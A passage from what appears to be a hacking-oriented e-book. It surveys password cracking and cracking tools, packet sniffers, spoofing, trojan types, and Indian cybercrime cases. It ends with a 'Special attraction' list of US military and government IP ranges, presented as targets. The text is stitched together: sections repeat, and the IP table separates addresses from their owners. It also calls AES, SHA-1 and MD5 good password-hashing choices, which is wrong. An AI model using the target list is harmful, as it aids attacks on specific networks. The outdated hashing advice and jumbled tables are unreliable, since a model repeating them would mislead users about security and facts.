explicitly enumerated or implicitly defined, may or may not incorporate knowledge about the victim, and may or may not be linguistically derived. Each of the three approaches, particularly 'dictionary attack', is frequently used as an umbrella term to denote all the three attacks and the spectrum of attacks encompassed by them. 38

Precomputation
In its most basic form, precomputation involves hashing each word in the dictionary (or any search space of candidate passwords) and storing the <plaintext, ciphertext> pairs in a way that enables lookup on the ciphertext field. This way, when a new encrypted password is obtained, password recovery is instantaneous. Precomputation can be very useful for a dictionary attack if salt is not used properly (see below), and the dramatic decrease in the cost of mass storage has made it practical for fairly large dictionaries. Advanced precomputation methods exist that are even more effective. By applying a timememory tradeoff, a middle ground can be reached - a search space of size N can be turned into an encrypted database of size O(N2/3) in which searching for an encrypted password takes time O(N2/3). The theory has recently been refined into a practical technique, and the online implementation at http://passcracking.com/ achieves impressive results on 8 character alphanumeric MD5 hashes. Another example [1] cracks alphanumeric Windows LAN Manager passwords in a few seconds. This is much faster than brute force attacks on the obsolete LAN Manager, which uses a particularly weak method of hashing the password. Current Windows systems still compute and store a LAN Manager hash by default for backwards compatibility. [2]) A technique similar to precomputation, known generically as memoization, can be used to crack multiple passwords at the cost of cracking just one. Since encrypting a word takes much longer than comparing it with a stored word, a lot of effort is saved by encrypting each word only once and comparing it with each of the encrypted passwords using an efficient list search algorithm. The two approaches may of course be combined: the timespace tradeoff attack can be modified to crack multiple passwords simultaneously in a shorter time than cracking them one after the other.

Salting
The benefits of precomputation and memoization can be nullified by randomizing the hashing process. This is known as salting. When the user sets a password, a short, random string called the salt is suffixed to the password before encrypting it; the salt is stored along with the encrypted password so that it can be used during verification. Since the salt is usually different for each user, the attacker can no longer construct tables with a single encrypted version of each candidate password. Early Unix systems used a 12-bit salt. Attackers could still build tables with common passwords encrypted with all 4096 possible 12-bit salts. 39

However, if the salt is long enough (e.g. 32 bits), there are too many possibilities and the attacker must repeat the encryption of every guess for each user.

Early Unix password vulnerability


Early Unix implementations used a 12-bit salt, which allowed for 4096 possibilities, and limited passwords to 8 characters. While 12 bits was good enough for most purposes in the 1970s (although some expressed doubts even then), by 2005 disk storage has become cheap enough that an attacker can precompute encryptions of millions of common passwords, including all 4096 possible salt variations for each password, and store the precomputed values on a single portable hard drive. An attacker with a larger budget can build a disk farm with all 6 character passwords and the most common 7 and 8 character passwords stored in encrypted form, for all 4096 possible salts. And when several thousand passwords are being cracked at once, memoization still offers some benefit. Since there is little downside to using a longer (say 32-, 64- or 128-bit) salt, and they render any precomputation or memoization hopeless, modern implementations choose to do so.

Prevention
The best method of preventing password cracking is to ensure that attackers cannot get access even to the encrypted password. For example, on the Unix operating system, encrypted passwords were originally stored in a publicly accessible file "/etc/passwd". On modern Unix (and similar) systems, on the other hand, they are stored in the file "/etc/shadow", which is accessible only to programs running with enhanced privileges (ie, 'system' privileges). This makes it harder for a malicious user to obtain the encrypted passwords in the first instance. Unfortunately, many common network protocols transmit the hashed passwords to allow remote authentication. Even if the attacker has no access to the password database itself, every attacker should also be prevented from being able to use the system itself to check a large number of passwords in a relatively small amount of time. For this reason, many systems include a significant forced delay (a few seconds is generally sufficient) between the entry of the password and returning a result. Also, it is a good policy to (temporarily) lock out an account that has been subjected to 'too many' incorrect password guesses, although this could be exploited to launch a denial of service attack. Too many in this context is frequently taken to be something like more than 3 failed attempts in 90 seconds, or more than a dozen failed attempts in an hour. 40

It is also imperative to choose good passwords (see password for more information) and a good encryption or hash algorithm that has stood the test of time. AES, SHA-1, and MD5 are common choices. Good implementations, including adequate salt, are also required. Key derivation functions, such as PBKDF2, are hashes that consume relatively large amounts of computer time so as to slow down the rate at which an attacker can test guesses, even if the hashed password is available. This process is known as key strengthening. However, no amount of effort put into preventing password cracking can be sufficient without a well-designed and well-implemented security policy. The canonical and all too common example of this is the user who leaves their password on a Post-It note stuck to their monitor or under their keyboard. Even sophisticated users who have been warned repeatedly are known to have such lapses. Password cracking programs Ophcrack - Open source Ophcrack is an Open Source (GPL License) program that cracks Windows LM hashes using rainbow tables. It can crack 99.9% of alphanumeric passwords of up to 14 characters in usually a few seconds, and at most a few minutes. There is also a LiveCD version which automates the retrieval, decryption, and cracking of passwords from a Windows system.Starting with version 2.3, Ophcrack also cracks NT hashes. Crack Crack is a Unix password cracking program designed to allow system administrators to locate users who may have weak passwords vulnerable to a dictionary attack. Crack began in 1990 when Alec Muffett, a Unix system administrator at the University of Wales Aberystwyth was trying to improve Dan Farmer's 'pwc' cracker in COPS and found that by re-engineering its memory management he got a noticeable performance increase. This led to a total rewrite which became "Crack v2.0" and further development to improve usability. Cain Cain and Abel is a Windows password recovery tool. It can recover many kinds of passwords using methods such as network packet sniffing, cracking various password hashes by using methods such as dictionary attacks, brute force and cryptanalysis attacks. Cryptanalysis attacks are done via rainbow tables which can be generated with the winrtgen.exe program provided with Cain. Cain and Abel is maintained by Massimiliano Montoro. John the Ripper 41

John the Ripper is a free password cracking software tool. Initially developed for the UNIX operating system, it currently runs on fifteen different platforms (11 flavors of Unix counting each flavor only once for all the architectures it supports -, DOS, Win32, BeOS, and OpenVMS). It is one of the most popular password testing/breaking programs as it combines a number of password crackers into one package, autodetects, and includes a customisable cracker. It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix flavors (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash. Additional modules have extended its ability to include MD4-based password hashes and passwords stored in LDAP, MySQL and others. John the Ripper is a perfectly safe program to install and run on your computer. If you are running a multi-user system, you should make sure you are shadowing your password file such that the hashes are not visible; however even if you are not, not installing John will not prevent a malicious user from running John on their own computer with your hashes[citation needed]. LC5 (formerly L0phtCrack) L0phtCrack is a password auditing and recovery application (now called LC5), originally produced by Mudge from L0pht Heavy Industries. It is used to test password strength and sometimes to recover lost Microsoft Windows passwords, by using dictionary, brute-force, and hybrid attacks. It was one of the crackers' tools of choice, although most use old versions because of its price and low availability. The application was produced by @stake after the L0pht merged with @stake in 2000. @stake was acquired by Symantec in 2004. Symantec has since stopped selling this tool to new customers citing US Government export regulations, and has announced that they will discontinue support by the end of 2006. LC5 can still be found at SecTools.Org and other unofficial mirrors. RainbowCrack RainbowCrack is the name of a computer program which performs password cracking. RainbowCrack differs from "conventional" brute force crackers in that it uses large precomputed files called rainbow tables to reduce the length of time needed to crack a password drastically. RainbowCrack was developed by Zhu Shuanglei, and implements an improved time-memory trade-off cryptanalysis attack which originated in Philippe Oechslin's Ophcrack.

Back
42

43

44

Sniffers: Basics and Detection


If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.

Introduction
A sniffer is a program or a device that eavesdrops on the network traffic by grabbing information traveling over a network. Sniffers basically are "Data Interception" technology. They work because the Ethernet was built around a principle of sharing. Most networks use broadcast technology wherein messages for one computer can be read by another computer on that network. In practice, all the other computers except the one for which the message is meant, will ignore that message. However, computers can be made to accept messages even if they are not meant for them. This is done by means of a Sniffer! Many people assume computers connected to a switch are safe from sniffing. Nothing could be further from the truth. Computers connected to switches are just as vulnerable to sniffing as those connected to a hub. This article seeks to explore the topic of sniffers, how they work, detecting and protecting your assets against the malicious use of these programs. Finally, towards the end we will talk about some commonly available sniffers.

How A Sniffer Works


A computer connected to the LAN has two addresses. One is the MAC (Media Access Control) address that uniquely identifies each node in a network and is stored on the network card itself. It is the MAC address that gets used by the Ethernet protocol while building frames to transfer data to and from a machine. The other is the IP address, which is used by applications. The Data Link Layer uses an Ethernet header with the MAC address of the destination machine rather than the IP Address. The Network Layer is responsible for mapping IP network addresses to the MAC address as required by the Data Link Protocol. It initially looks up the MAC address of the destination machine in a table, usually called the ARP (Address Resolution Protocol) cache. If no entry is found for the IP address, the Address Resolution Protocol broadcasts a request packet (ARP request) to all machines on the network. The machine with that address responds to the source machine with its MAC 45

address. This MAC address then gets added to the source machines ARP Cache. The source machine in all its communications with the destination machine then uses this MAC address. There are two basic types of Ethernet environments and how sniffers work in both these cases is slightly different.Shared Ethernet: In a shared Ethernet environment, all hosts are connected to the same bus and compete with one another for bandwidth. In such an environment packets meant for one machine are received by all the other machines. Thus when a machine Venus

46

Well-known packet sniffers


AiroPeek dSniff Ethereal EtherPeek Ettercap Kismet Javvin Packet Aalyzer NetStumbler Network General Sniffer Network Instruments Observer OmniPeek PRTG snoop (Solaris) tcpdump Wireshark (formerly known as Ethereal[1]) WPE (Winsock packet editor)

Spoofing attack
In the context of network security, a spoofing attack is a situation in which one person or program successfully masquerades as another by falsifying data and thereby gains an illegitimate advantage.

Man-in-the-middle attack and internet protocol spoofing


An example from cryptography is the man-in-the-middle attack, in which an attacker spoofs Alice into believing he's Bob, and spoofs Bob into believing he's Alice, thus gaining access to all messages in both directions without the trouble of any cryptanalytic effort. 47

The attacker must monitor the packets sent from Alice to Bob and then guess the sequence number of the packets. Then the attacker knocks out Alice with a SYN attack and injects his own packets, claiming to have the address of Alice. Alice's firewall can defend against some spoof attacks when it has been configured with knowledge of all the IP addresses connected to each of its interfaces. It can then detect a spoofed packet if it arrives at an interface that is not known to be connected to the IP address. Many carelessly designed protocols are subject to spoof attacks, including many of those used on the Internet. See Internet protocol spoofing.

URL spoofing and phishing


Another kind of spoofing is "webpage spoofing," also known as phishing. In this attack, a legitimate web page such as a bank's site is reproduced in "look and feel" on another server under control of the attacker. The intent is to fool the users into thinking that they are connected to a trusted site, for instance to harvest user names and passwords.This attack is often performed with the aid of URL spoofing, which exploits web browser bugs in order to display incorrect URLs in the browsers location bar; or with DNS cache poisoning in order to direct the user away from the legitimate site and to the fake one. Once the user puts in their password, the attack-code reports a password error, then redirects the user back to the legitimate site.

Referer spoofing
Some websites, especially pornographic paysites, allow access to their materials only from certain approved (login-) pages. This is enforced by checking the Referer header of the HTTP request. This referer header however can be changed (known as "Referer spoofing" or "Ref-tar spoofing"), allowing users to gain unauthorized access to the materials. Poisoning of file-sharing networks "Spoofing" can also refer to copyright holders placing distorted or unlistenable versions of works on file-sharing networks, to discourage downloading from these sources.

Caller ID spoofing
In public telephone networks, it has for a long while been possible to find out who is calling you by looking at the Caller ID information that is transmitted with the call. There are technologies that transmit this information on landlines, on cellphones and also with VoIP. 48

Unfortunately, there are now technologies (especially associated with VoIP) that allow callers to lie about their identity, and present false names and numbers, which could of course be used as a tool to defraud or harass. Because there are services and gateways that interconnect VoIP with other public phone networks, these false Caller IDs can be transmitted to any phone on the planet, which makes the whole Caller ID information now next to useless. Due to the distributed geographic nature of the Internet, VoIP calls can be generated in a different country to the receiver, which means that it is very difficult to have a legal framework to control those who would use fake Caller IDs as part of a scam.

Man-in-the-middle attack and internet protocol spoofing


An example from cryptography is the man-in-the-middle attack, in which an attacker spoofs Alice into believing he's Bob, and spoofs Bob into believing he's Alice, thus gaining access to all messages in both directions without the trouble of any cryptanalytic effort. The attacker must monitor the packets sent from Alice to Bob and then guess the sequence number of the packets. Then the attacker knocks out Alice with a SYN attack and injects his own packets, claiming to have the address of Alice. Alice's firewall can defend against some spoof attacks when it has been configured with knowledge of all the IP addresses connected to each of its interfaces. It can then detect a spoofed packet if it arrives at an interface that is not known to be connected to the IP address. Many carelessly designed protocols are subject to spoof attacks, including many of those used on the Internet. See Internet protocol spoofing.

URL spoofing and phishing


Another kind of spoofing is "webpage spoofing," also known as phishing. In this attack, a legitimate web page such as a bank's site is reproduced in "look and feel" on another server under control of the attacker. The intent is to fool the users into thinking that they are connected to a trusted site, for instance to harvest user names and passwords. This attack is often performed with the aid of URL spoofing, which exploits web browser bugs in order to display incorrect URLs in the browsers location bar; or with DNS cache poisoning in order to direct the user away from the legitimate site and to the fake one. Once the user puts in their password, the attack-code reports a password error, then redirects the user back to the legitimate site.

49

Referer spoofing
Some websites, especially pornographic paysites, allow access to their materials only from certain approved (login-) pages. This is enforced by checking the Referer header of the HTTP request. This referer header however can be changed (known as "Referer spoofing" or "Ref-tar spoofing"), allowing users to gain unauthorized access to the materials.

Poisoning of file-sharing networks


"Spoofing" can also refer to copyright holders placing distorted or unlistenable versions of works on file-sharing networks, to discourage downloading from these sources.

Caller ID spoofing
In public telephone networks, it has for a long while been possible to find out who is calling you by looking at the Caller ID information that is transmitted with the call. There are technologies that transmit this information on landlines, on cellphones and also with VoIP. Unfortunately, there are now technologies (especially associated with VoIP) that allow callers to lie about their identity, and present false names and numbers, which could of course be used as a tool to defraud or harass. Because there are services and gateways that interconnect VoIP with other public phone networks, these false Caller IDs can be transmitted to any phone on the planet, which makes the whole Caller ID information now next to useless. Due to the distributed geographic nature of the Internet, VoIP calls can be generated in a different country to the receiver, which means that it is very difficult to have a legal framework to control those who would use fake Caller IDs as part of a scam.

Trojan horse
Example of a simple Trojan horse A simple example of a trojan horse would be a program named "waterfalls.scr" claiming to be a free waterfall screensaver which, when run, instead begins erasing all the files on the victims computer. Types of Trojan horses Trojan horses are almost always designed to do various harmful things, but could be harmless. They are broken down in classification based on how they breach systems and the damage they cause. The seven main types of Trojan horses are: Remote Access Trojans Data Sending Trojans 50

Destructive Trojans Proxy Trojans FTP Trojans security software disabler Trojans denial-of-service attack (DoS) Trojans URL Trojans erasing or overwriting data on a computer. encrypting files in a cryptoviral extortion attack. corrupting files in a subtle way. upload and download files. allowing remote access to the victim's computer. This is called a RAT. (remote administration tool) spreading other malware, such as viruses. In this case the Trojan horse is called a 'dropper' or 'vector'. setting up networks of zombie computers in order to launch DDoS attacks or send spam. spying on the user of a computer and covertly reporting data like browsing habits to other people (see the article on spyware). make screenshots. logging keystrokes to steal information such as passwords and credit card numbers (also known as a keylogger). phish for bank or other account details, which can be used for criminal activities. installing a backdoor on a computer system. opening and closing CD-ROM tray. harvest e-mail addresses and use them for spam. Restarts the computer whenever the infected program is started.

Some examples are:

Time bombs and logic bombs


"Time bombs" and "logic bombs" are types of trojan horses. "Time bombs" activate on particular dates and/or times. "Logic bombs" activate on certain conditions met by the computer. 51

Droppers
Droppers perform two tasks at once. A dropper performs a legitimate task but also installs a computer virus or a computer worm on a system or disk at the same time.

Precautions against Trojan horses


Trojan horses can be protected against through end-user awareness. Trojan Horse viruses can cause a great deal of damage to a personal computer but even more damage to a business, particularly a small business that usually does not have the same virus protection capabilities as a large business. Since a Trojan Horse virus is hidden, it is harder to protect yourself or your company from it, but there are things that you can do. Trojan Horses are most commonly spread through an e-mail, much like other types of common viruses. The only difference being of course is that a Trojan Horse is hidden. The best ways to protect yourself and your company from Trojan Horses are as follows: 1. If you receive e-mail from someone that you do not know or you receive an unknown attachment, never open it right away. As an e-mail user you should confirm the source. Some hackers have the ability to steal address books, so if you see e-mail from someone you know, it is not necessarily safe. 2. When setting up your e-mail client, make sure that you have the settings so that attachments do not open automatically. Some e-mail clients come ready with an anti-virus program that scans any attachments before they are opened. If your client does not come with this, it would be best to purchase one or download one for free. 3. Make sure your computer has an anti-virus program on it and update it regularly. If you have an auto-update option included in your anti-virus program you should turn it on; that way if you forget to update your software you can still be protected from threats 4. Operating systems offer patches to protect their users from certain threats and viruses, including Trojan Horses. Software developers like Microsoft offer patches that in a sense "close the hole" that the Trojan horse or other virus would use to get through to your system. If you keep your system updated with these patches, your computer is kept much safer. 5. Avoid using peer-to-peer or P2P sharing networks like Kazaa, Limewire, Ares, or Gnutella because they are generally unprotected from viruses and Trojan Horse viruses spread through them especially easily. Some of these programs do offer some virus protection, but this is

52

often not strong enough. If you insist on using P2P, it would be safe to not download files that claim to be "rare" songs, books, movies, pictures, etc. Besides these sensible precautions, one can also install anti-trojan software, some of which is offered free.

Methods of Infection
The majority of trojan horse infections occur because the user was tricked into running an infected program. This is why it is advised to not open unexpected attachments on emails -- the program is often a cute animation or a sexy picture, but behind the scenes it infects the computer with a trojan or worm. The infected program doesn't have to arrive via email, though; it can be sent to you in an Instant Message, downloaded from a Web site or by FTP, or even delivered on a CD or floppy disk. (Physical delivery is uncommon, but if you were the specific target of an attack, it would be a fairly reliable way to infect your computer.) Furthermore, an infected program could come from someone who sits down at your computer and loads it manually. Websites: You can be infected by visiting a rogue website. Email: If you use Microsoft Outlook, you're vulnerable to many of the same problems that Internet Explorer has, even if you don't use IE directly. Open ports: Computers running their own servers (HTTP, FTP, or SMTP, for example), allowing Windows file sharing, or running programs that provide filesharing capabilities such as Instant Messengers (AOL's AIM, MSN Messenger, etc.) may have vulnerabilities similar to those described above. These programs and services may open a network port giving attackers a means for interacting with these programs from anywhere on the Internet. Vulnerabilities allowing unauthorized remote entry are regularly found in such programs, so they should be avoided or properly secured. A firewall may be used to limit access to open ports. Firewalls are widely used in practice, and they help to mitigate the problem of remote trojan insertion via open ports, but they are not a totally impenetrable solution, either. Some of the modern trojans that come through the messengers,they come in as a very important looking message, but contain trojans, the exe files are same or look same as that of windows system proccesses like 'Svchost.exe', some of the look alike trojans are: Svchost32.exe Svhost.exe back.exe 53

Well-known trojan horses


Back Orifice Back Orifice 2000 NetBus SubSeven Downloader-EV Pest Trap AIDS Back Orifice Back Orifice 2000 Beast Trojan Bifrose NetBus Optix Pro Posion Ivy ProRat Sub7 EGABTR RemoteHAK A-311 Death A4zeta Abacab Acessor AcidBattery Acid Drop AcidHead Acid Kor Acidsena AcidShivers Acid Trojan Horse AckCmd Acojonaor 54 ksv Carl-Fredrik Neikter Insurrection

Acropolis Admin.Troj.Kikzyurarse Advertiser Bot AeonwindDoll Afcore A-FTP AF Agent 40421 AH Aibolit AIMaster AIM Filter AimFrame aim P Aim Password Stealer AIM Pws AimRat AIM Robber AIM Spy AIMVision AIR AirBot Akosch Aladino Al-Bareki Alcatraz Alerter AlexMessoMalex Alicia Alien Hacker Alien Spy Almaster Almetyevsk Almq 55

Alex Alofin Alop Alph AlphaDog Alvgus Amanda Amiboide Uploader Ambush AmigaAnywhere Amitis Amoeba AMRC AMS Anal FTP Anal Ra AnarchoIntruder Andromeda A New Trojan Angelfire AngelShell Annoy Toys Anthena Anti Danger Anti-Denial AntiMks AntiPC AntiLamer Backdoor Anti MSN Antylamus AolAdmin Apdoor Aphex's FTP Aphex's Remote Packet Sniffer 56

Aphex tunneld 2.0 AppServ APRE Aqua Arcanum Area Control Ares Invader Armageddon arplhmd Arranca Arsd Artic Arturik AsbMay A.S.H. Ashley Ass4ss1n Assasin Asylum Admin.Troj.Kikzyurarse Atentator A-Trojan Attack FTP Atwinda AudioDoor Autocrat AutoPWN Autograph AutoSpY Avanzado Avone Ayan Bilisim Azrael BD Blade runner 0.80a 57

Crazy Daisy Connect4 Donald Dick Flatley Trojan Theef Twelve Tricks Rituall33

Back

58

59

Introduction to Cyber Crime


The first recorded cyber crime took place in the year 1820! That is not surprising considering the fact that the abacus, which is thought to be the earliest form of a computer, has been around since 3500 B.C. in India, Japan and China. The era of modern computers, however, began with the analytical engine of Charles Babbage. In 1820, Joseph-Marie Jacquard, a textile manufacturer in France, produced the loom. This device allowed the repetition of a series of steps in the weaving of special fabrics. This resulted in a fear amongst Jacquard's employees that their traditional employment and livelihood were being threatened. They committed acts of sabotage to discourage Jacquard from further use of the new technology. This is the first recorded cyber crime! Today computers have come a long way, with neural networks and nano-computing promising to turn every atom in a glass of water into a computer capable of performing a Billion operations per second. Cyber crime is an evil having its origin in the growing dependence on computers in modern life. In a day and age when everything from microwave ovens and refrigerators to nuclear power plants is being run on computers, cyber crime has assumed rather sinister implications. Major cyber crimes in the recent past include the Citibank rip off. US $ 10 million were fraudulently transferred out of the bank and into a bank account in Switzerland. A Russian hacker group led by Vladimir Kevin, a renowned hacker, perpetrated the attack. The group compromised the bank's security systems. Vladimir was allegedly using his office computer at AO Saturn, a computer firm in St. Petersburg, Russia, to break into Citibank computers. He was finally arrested on Heathrow airport on his way to Switzerland

60

Defining Cyber Crime


At the onset, let us satisfactorily define "cyber crime" and differentiate it from "conventional Crime". 166 Computer crime can involve criminal activities that are traditional in nature, such as theft, fraud, forgery, defamation and mischief, all of which are subject to the Indian Penal Code. The abuse of computers has also given birth to a gamut of new age crimes that are addressed by the Information Technology Act, 2000. Defining cyber crimes, as "acts that are punishable by the Information Technology Act" would be unsuitable as the Indian Penal Code also covers many cyber crimes, such as email spoofing and cyber defamation, sending threatening emails etc. A simple yet sturdy definition of cyber crime would be "unlawful acts wherein the computer is either a tool or a target or both". Let us examine the acts wherein the computer is a tool for an unlawful act. This kind of activity usually involves a modification of a conventional crime by using computers. Some examples are:

Financial crimes
This would include cheating, credit card frauds, money laundering etc. To cite a recent case, a website offered to sell Alphonso mangoes at a throwaway price. Distrusting such a transaction, very few people responded to or supplied the website with their credit card numbers. These people were actually sent the Alphonso mangoes. The word about this website now spread like wildfire. Thousands of people from all over the country responded and ordered mangoes by providing their credit card numbers. The owners of what was later proven to be a bogus website then fled taking the numerous credit card numbers and proceeded to spend huge amounts of money much to the chagrin of the card owners.

Cyber pornography

61

This would include pornographic websites; pornographic magazines produced using computers (to publish and print the material) and the Internet (to download and transmit pornographic pictures, photos, writings etc). Recent Indian incidents revolving around cyber pornography include the Air Force Balbharati School case. A student of the Air Force Balbharati School, Delhi, was teased by all his classmates for having a pockmarked face. Tired of the cruel jokes, he decided to get back at his tormentors. He scanned photographs of his classmates and teachers, morphed them with nude photographs and put them up on a website that he uploaded on to a free web hosting service. It was only after the father of one of the class girls featured on the website objected and lodged a complaint with the police that any action was taken. In another incident, in Mumbai a Swiss couple would gather slum children and then would force them to appear for obscene photographs. They would then upload these photographs to websites specially designed for paedophiles. The Mumbai police arrested the couple for pornography.

Sale of illegal articles


This would include sale of narcotics, weapons and wildlife etc., by posting information on websites, auction websites, and bulletin boards or 167 simply by using email communication. E.g. many of the auction sites even in India are believed to be selling cocaine in the name of 'honey'.

Online gambling
There are millions of websites; all hosted on servers abroad, that offer online gambling. In fact, it is believed that many of these websites are actually fronts for money laundering.

62

63

Intellectual Property crimes


These include software piracy, copyright infringement, trademarks violations, theft of computer source code etc.

Email spoofing
A spoofed email is one that appears to originate from one source but actually has been sent from another source. E.g. Pooja has an e-mail address pooja@asianlaws.org. Her enemy, Sameer spoofs her e-mail and sends obscene messages to all her acquaintances. Since the emails appear to have originated from Pooja, her friends could take offence and relationships could be spoiled for life. Email spoofing can also cause monetary damage. In an American case, a teenager made millions of dollars by spreading false information about certain companies whose shares he had short sold. This misinformation was spread by sending spoofed emails, purportedly from news agencies like Reuters, to share brokers and investors who were informed that the companies were doing very badly. Even after the truth came out the values of the shares did not go back to the earlier levels and thousands of investors lost a lot of money.

Forgery
Counterfeit currency notes, postage and revenue stamps, mark sheets etc can be forged using sophisticated computers, printers and scanners. Outside many colleges across India, one finds touts soliciting the sale of fake mark sheets or even certificates. These are made using computers, and high quality scanners and printers. In fact, this has becoming a booming business involving thousands of Rupees being given to student gangs in exchange for these bogus but authentic looking certificates.

Cyber Defamation

64

This occurs when defamation takes place with the help of computers and / or the Internet. E.g. someone publishes defamatory matter about someone on a website or sends emails containing defamatory information to all of that person's friends. In a recent occurrence, Surekha (names of people have been changed), a young girl was about to be married to Suraj. She was really pleased because despite it being an arranged marriage, she had liked the boy. He had seemed to be open-minded and pleasant. Then, one day when she met Suraj, he looked worried and even a little upset. He was not really interested in talking to her. When asked he told her that, members of his family had been receiving e-mails that contained malicious things about Surekha's character. Some of them spoke of affairs, which she had had in the past. He told her 168 that, his parents were justifiably very upset and were also considering breaking off the engagement. Fortunately, Suraj was able to prevail upon his parents and the other elders of his house to approach the police instead of blindly believing what was contained in the mails.During investigation, it was revealed that the person sending those e-mails was none other than Surekha's stepfather. He had sent these emails so as to break up the marriage. The girl's marriage would have caused him to lose control of her property of which he was the guardian till she got married. Another famous case of cyber defamation occurred in America. All friends and relatives of a lady were beset with obscene e-mail messages appearing to originate from her account. These mails were giving the lady in question a bad name among her friends. The lady was an activist against pornography. In reality, a group of people displeased with her views and angry with her for opposing them had decided to get back at her by using such underhanded methods. In addition to sending spoofed obscene e-mails they also put up websites about her, that basically maligned her character and sent e-mails to her family and friends containing matter defaming her.

Cyber stalking
The Oxford dictionary defines stalking as "pursuing stealthily". Cyber stalking nvolves following a person's movements across the Internet by posting messages (sometimes threatening) on the bulletin boards frequented by the victim, entering the chat-rooms frequented by the victim, constantly bombarding the victim with emails etc.

65

Back

66

67

Index

IP Address Default Router Password Net BIOS Mobile Hacking

Back

68

Special attraction
Government, military and intelligence IP range. RANGE 6 6.* - Army Information Systems Center RANGE 7 7.*.*.* Defense Information Systems Agency, VA RANGE 11 11.*.*.* DoD Intel Information Systems, Defense Intelligence Agency, Washington DC RANGE 21 21. - US Defense Information Systems Agency RANGE 22 22.* - Defense Information Systems Agency RANGE 24 24.198.*.* RANGE 25 25.*.*.* Royal Signals and Radar Establishment, UK RANGE 26 26.* - Defense Information Systems Agency RANGE 29 29.* - Defense Information Systems Agency RANGE 30 30.* - Defense Information Systems Agency

69

RANGE 49 49.* - Joint Tactical Command RANGE 50 50.* - Joint Tactical Command RANGE 55 55.* - Army National Guard Bureau

RANGE 128 128.51.0.0 Department of Defense 128.56.0.0 U.S. Naval Academy 128.60.0.0 Naval Research Laboratory 128.63.0.0 Army Ballistics Research Laboratory 128.80.0.0 Army Communications Electronics Command 128.98.0.0 - 128.98.255.255 Defence Evaluation and Research Agency 128.102.0.0 NASA Ames Research Center 128.149.0.0 NASA Headquarters 128.154.0.0 NASA Wallops Flight Facility 128.155.0.0 NASA Langley Research Center 128.156.0.0 NASA Lewis Network Control Center 128.157.0.0 NASA Johnson Space Center 128.158.0.0 NASA Ames Research Center 128.159.0.0 NASA Ames Research Center 128.160.0.0 Naval Research Laboratory 128.161.0.0 NASA Ames Research Center 128.183.0.0 NASA Goddard Space Flight Center 128.190.0.0 Army Belvoir Reasearch and Development Center 128.202.0.0 50th Space Wing 128.216.0.0 MacDill Air Force Base 128.236.0.0 U.S. Air Force Academy RANGE 129 129.23.0.0 Strategic Defense Initiative Organization 70

129.29.0.0 129.50.0.0 129.51.0.0 129.52.0.0 129.165.0.0 129.166.0.0 129.167.0.0 129.168.0.0 129.190.0.0 129.198.0.0 129.209.0.0 129.229.0.0 129.251.0.0 RANGE 130 130.40.0.0 130.90.0.0 130.109.0.0 130.114.0.0 130.124.0.0 130.165.0.0 130.167.0.0

United States Military Academy NASA Marshall Space Flight Center Patrick Air Force Base Wright-Patterson Air Force Base NASA Goddard Space Flight Center NASA - John F. Kennedy Space Center NASA Marshall Space Flight Center NASA Lewis Research Center Naval Underwater Systems Center Air Force Flight Test Center Army Ballistics Research Laboratory U.S. Army Corps of Engineers United States Air Force Academy

NASA Johnson Space Center Mather Air Force Base Naval Coastal Systems Center Army Aberdeen Proving Ground Installation Support Activity Honeywell Defense Systems Group U.S.Army Corps of Engineers NASA Headquarters

RANGE 131 131.6.0.0 131.10.0.0 131.17.0.0 131.21.0.0 131.22.0.0 131.24.0.0 131.25.0.0 131.32.0.0 131.35.0.0 Langley Air Force Base Barksdale Air Force Base Sheppard Air Force Base Hahn Air Base Keesler Air Force Base 6 Communications Squadron Patrick Air Force Base 37 Communications Squadron Fairchild Air Force Base 71

131.36.0.0 131.37.0.0 131.38.0.0 131.39.0.0 131.40.0.0 131.44.0.0 131.46.0.0 131.47.0.0 131.50.0.0 131.52.0.0 131.54.0.0 131.56.0.0 131.58.0.0 131.59.0.0 131.61.0.0 131.62.0.0 131.74.0.0 131.84.0.0 131.92.0.0 131.105.0.0 131.110.0.0 131.120.0.0 131.121.0.0 131.122.0.0 131.176.0.0 131.182.0.0 131.250.0.0 RANGE 132 132.3.0.0 132.6.0.0 132.9.0.0 132.10.0.0 132.11.0.0

Yokota Air Base Elmendorf Air Force Base Hickam Air Force Base 354CS/SCSN Bergstrom Air Force Base Randolph Air Force Base 20 Communications Squadron Andersen Air Force Base Davis-Monthan Air Force Base 56 Communications Squadron /SCBB Air Force Concentrator Network Upper Heyford Air Force Base Alconbury Royal Air Force Base 7 Communications Squadron McConnell Air Force Base Norton Air Force Base Defense MegaCenter Columbus Defense Technical Information Center Army Information Systems Command - Aberdeen (EA) McClellan Air Force Base NASA/Michoud Assembly Facility Naval Postgraduate School United States Naval Academy United States Naval Academy European Space Operations Center NASA Headquarters Office of the Chief of Naval Research

Williams Air Force Base Ankara Air Station 28th Bomb Wing 319 Comm Sq Hellenikon Air Base 72

132.12.0.0 132.13.0.0 132.14.0.0 132.15.0.0 132.16.0.0 132.17.0.0 132.18.0.0 132.20.0.0 132.21.0.0 132.22.0.0 132.24.0.0 132.30.0.0 132.31.0.0 132.34.0.0 132.35.0.0 132.38.0.0 132.39.0.0 132.42.0.0 132.43.0.0 132.45.0.0 132.46.0.0 132.48.0.0 132.50.0.0 132.52.0.0 132.54.0.0 132.55.0.0 132.57.0.0 132.58.0.0 132.59.0.0 132.61.0.0 132.79.0.0 132.82.0.0 132.86.0.0 132.94.0.0

Myrtle Beach Air Force Base Bentwaters Royal Air Force Base Air Force Concentrator Network Kadena Air Base Kunsan Air Base Lindsey Air Station McGuire Air Force Base 35th Communications Squadron Plattsburgh Air Force Base 23Communications Sq Dover Air Force Base Lajes Air Force Base Loring Air Force Base Cannon Air Force Base Altus Air Force Base Goodfellow AFB K.I. Sawyer Air Force Base Spangdahlem Air Force Base Zweibruchen Air Force Base Chanute Air Force Base Columbus Air Force Base Laughlin Air Force Base Reese Air Force Base Vance Air Force Base Langley AFB Torrejon Air Force Base Castle Air Force Base Nellis Air Force Base 24Comm Squadron\SCSNA SSG/SIN Army National Guard Bureau Army National Guard Bureau National Guard Bureau Army National Guard Bureau 73

132.109.0.0 132.114.0.0 132.117.0.0 132.122.0.0 132.133.0.0 132.159.0.0 132.193.0.0 132.250.0.0 RANGE 134

National Guard Bureau Army National Guard Army National Guard Bureau South Carolina Army National Guard, USPFO National Guard Bureau Army Information Systems Command Army Research Office Naval Research Laboratory

